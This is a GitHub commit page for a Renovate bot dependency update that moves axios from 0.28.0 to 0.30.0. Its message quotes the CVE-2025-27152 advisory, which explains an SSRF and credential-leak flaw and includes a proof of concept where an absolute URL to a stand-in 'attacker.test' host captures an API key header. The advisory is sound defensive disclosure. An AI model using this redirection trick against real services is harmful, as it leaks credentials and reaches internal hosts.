Skip to content

Commit 54dbca1

Browse files
renovate[bot]renovate[bot]
authored
chore(deps): update dependency axios to v0.30.0 [security] (#20)
This PR contains the following updates: | Package | Change | Age | Adoption | Passing | Confidence | |---|---|---|---|---|---| | [axios](https://axios-http.com) ([source](https://redirect.github.com/axios/axios)) | [`0.28.0` -> `0.30.0`](https://renovatebot.com/diffs/npm/axios/0.28.0/0.30.0) | [![age](https://developer.mend.io/api/mc/badges/age/npm/axios/0.30.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/axios/0.30.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/axios/0.28.0/0.30.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/axios/0.28.0/0.30.0?slim=true)](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-27152](https://redirect.github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6) ### Summary A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463 A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠`baseURL` is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. ### Details Consider the following code snippet: ```js import axios from "axios"; const internalAPIClient = axios.create({ baseURL: "http://example.test/api/v1/users/", headers: { "X-API-KEY": "1234567890", }, }); // const userId = "123"; const userId = "http://attacker.test/"; await internalAPIClient.get(userId); // SSRF ``` In this example, the request is sent to `http://attacker.test/` instead of the `baseURL`. As a result, the domain owner of `attacker.test` would receive the `X-API-KEY` included in the request headers. It is recommended that: - When `baseURL` is set, passing an absolute URL such as `http://attacker.test/` to `get()` should not ignore `baseURL`. - Before sending the HTTP request (after combining the `baseURL` with the user-provided parameter), axios should verify that the resulting URL still begins with the expected `baseURL`. ### PoC Follow the steps below to reproduce the issue: 1. Set up two simple HTTP servers: ``` mkdir /tmp/server1 /tmp/server2 echo "this is server1" > /tmp/server1/index.html echo "this is server2" > /tmp/server2/index.html python -m http.server -d /tmp/server1 10001 & python -m http.server -d /tmp/server2 10002 & ``` 2. Create a script (e.g., main.js): ```js import axios from "axios"; const client = axios.create({ baseURL: "http://localhost:10001/" }); const response = await client.get("http://localhost:10002/"); console.log(response.data); ``` 3. Run the script: ``` $ node main.js this is server2 ``` Even though `baseURL` is set to `http://localhost:10001/`, axios sends the request to `http://localhost:10002/`. ### Impact - Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed. - SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running. - Affected Users: Software that uses `baseURL` and does not validate path parameters is affected by this issue. --- ### Release Notes <details> <summary>axios/axios (axios)</summary> ### [`v0.30.0`](https://redirect.github.com/axios/axios/releases/tag/v0.30.0) [Compare Source](https://redirect.github.com/axios/axios/compare/v0.29.0...v0.30.0) #### Release notes: ##### Bug Fixes - fix: modify log while request is aborted by [@&#8203;mori5321](https://redirect.github.com/mori5321) in [https://github.com/axios/axios/pull/4917](https://redirect.github.com/axios/axios/pull/4917) - fix: update CHANGELOG.md for v0.x by [@&#8203;TehZarathustra](https://redirect.github.com/TehZarathustra) in [https://github.com/axios/axios/pull/6271](https://redirect.github.com/axios/axios/pull/6271) - fix: modify upgrade guide for 0.28.1's breaking change by [@&#8203;nafeger](https://redirect.github.com/nafeger) in [https://github.com/axios/axios/pull/6787](https://redirect.github.com/axios/axios/pull/6787) - fix: backport allowAbsoluteUrls vulnerability fix to v0.x by [@&#8203;thatguyinabeanie](https://redirect.github.com/thatguyinabeanie) in [https://github.com/axios/axios/pull/6829](https://redirect.github.com/axios/axios/pull/6829) - fix: add allowAbsoluteUrls type by [@&#8203;thatguyinabeanie](https://redirect.github.com/thatguyinabeanie) in [https://github.com/axios/axios/pull/6849](https://redirect.github.com/axios/axios/pull/6849) ##### Contributors to this release - [@&#8203;mori5321](https://redirect.github.com/mori5321) made their first contribution in [https://github.com/axios/axios/pull/4917](https://redirect.github.com/axios/axios/pull/4917) - [@&#8203;TehZarathustra](https://redirect.github.com/TehZarathustra) made their first contribution in [https://github.com/axios/axios/pull/6271](https://redirect.github.com/axios/axios/pull/6271) - [@&#8203;nafeger](https://redirect.github.com/nafeger) made their first contribution in [https://github.com/axios/axios/pull/6787](https://redirect.github.com/axios/axios/pull/6787) - [@&#8203;thatguyinabeanie](https://redirect.github.com/thatguyinabeanie) made their first contribution in [https://github.com/axios/axios/pull/6829](https://redirect.github.com/axios/axios/pull/6829) **Full Changelog**: axios/axios@v0.29.0...v0.30.0 ### [`v0.29.0`](https://redirect.github.com/axios/axios/releases/tag/v0.29.0) [Compare Source](https://redirect.github.com/axios/axios/compare/v0.28.1...v0.29.0) #### Release notes: ##### Bug Fixes - fix(backport): backport security fixes in commits [#&#8203;6167](https://redirect.github.com/axios/axios/issues/6167) and [#&#8203;6163](https://redirect.github.com/axios/axios/issues/6163) to v0.x by [@&#8203;Sean-Powell](https://redirect.github.com/Sean-Powell) in [https://github.com/axios/axios/pull/6402](https://redirect.github.com/axios/axios/pull/6402) - fix: omit nulls in params by [@&#8203;Willshaw](https://redirect.github.com/Willshaw) in [https://github.com/axios/axios/pull/6394](https://redirect.github.com/axios/axios/pull/6394) - fix(backport): fix paramsSerializer function validation by [@&#8203;solonzhu](https://redirect.github.com/solonzhu) in [https://github.com/axios/axios/pull/6361](https://redirect.github.com/axios/axios/pull/6361) - fix: Regular Expression Denial of Service (ReDoS) by [@&#8203;qiongshusheng](https://redirect.github.com/qiongshusheng) in [https://github.com/axios/axios/pull/6708](https://redirect.github.com/axios/axios/pull/6708) ##### Contributors to this release - [@&#8203;Sean-Powell](https://redirect.github.com/Sean-Powell) made their first contribution in [https://github.com/axios/axios/pull/6402](https://redirect.github.com/axios/axios/pull/6402) - [@&#8203;Willshaw](https://redirect.github.com/Willshaw) made their first contribution in [https://github.com/axios/axios/pull/6394](https://redirect.github.com/axios/axios/pull/6394) - [@&#8203;solonzhu](https://redirect.github.com/solonzhu) made their first contribution in [https://github.com/axios/axios/pull/6361](https://redirect.github.com/axios/axios/pull/6361) - [@&#8203;qiongshusheng](https://redirect.github.com/qiongshusheng) made their first contribution in [https://github.com/axios/axios/pull/6708](https://redirect.github.com/axios/axios/pull/6708) ### [`v0.28.1`](https://redirect.github.com/axios/axios/releases/tag/v0.28.1) [Compare Source](https://redirect.github.com/axios/axios/compare/v0.28.0...v0.28.1) #### Release notes: #### Release notes: ##### Bug Fixes - fix(backport): custom params serializer support ([#&#8203;6263](https://redirect.github.com/axios/axios/issues/6263)) - fix(backport): uncaught ReferenceError `req` is not defined ([#&#8203;6307](https://redirect.github.com/axios/axios/issues/6307)) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/emartech/json-logger-js). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MC43LjEiLCJ1cGRhdGVkSW5WZXIiOiI0MC43LjEiLCJ0YXJnZXRCcmFuY2giOiJtYXN0ZXIiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
1 parent bb9db8b commit 54dbca1

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

package.json

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -35,7 +35,7 @@
3535
"@types/sinon-chai": "3.2.8",
3636
"@typescript-eslint/eslint-plugin": "5.38.1",
3737
"@typescript-eslint/parser": "5.38.1",
38-
"axios": "0.28.0",
38+
"axios": "0.30.0",
3939
"chai": "4.3.6",
4040
"eslint": "8.24.0",
4141
"eslint-config-emarsys": "5.1.0",

0 commit comments

Comments
 (0)